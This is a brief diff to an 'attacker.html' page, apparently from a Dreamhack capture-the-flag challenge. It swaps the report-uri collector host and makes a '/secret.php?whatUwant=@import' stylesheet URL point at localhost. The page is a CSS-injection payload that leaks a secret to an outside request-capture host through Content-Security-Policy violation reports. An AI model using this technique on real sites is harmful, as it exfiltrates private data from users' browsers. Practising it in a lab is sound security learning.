--- a/attacker.html
+++ b/attacker.html
@@ -1,8 +1,8 @@
 <!DOCTYPE html>
 <html>
 <head>
-  <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'self'; report-uri https://ievgbhx.request.dreamhack.games">
-  <link rel="stylesheet" href="/secret.php?whatUwant=@import '">
+  <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'self'; report-uri https://uborjqo.request.dreamhack.games">
+  <link rel="stylesheet" href="http://localhost/secret.php?whatUwant=@import '">
 </head>
 <body></body>
 </html>
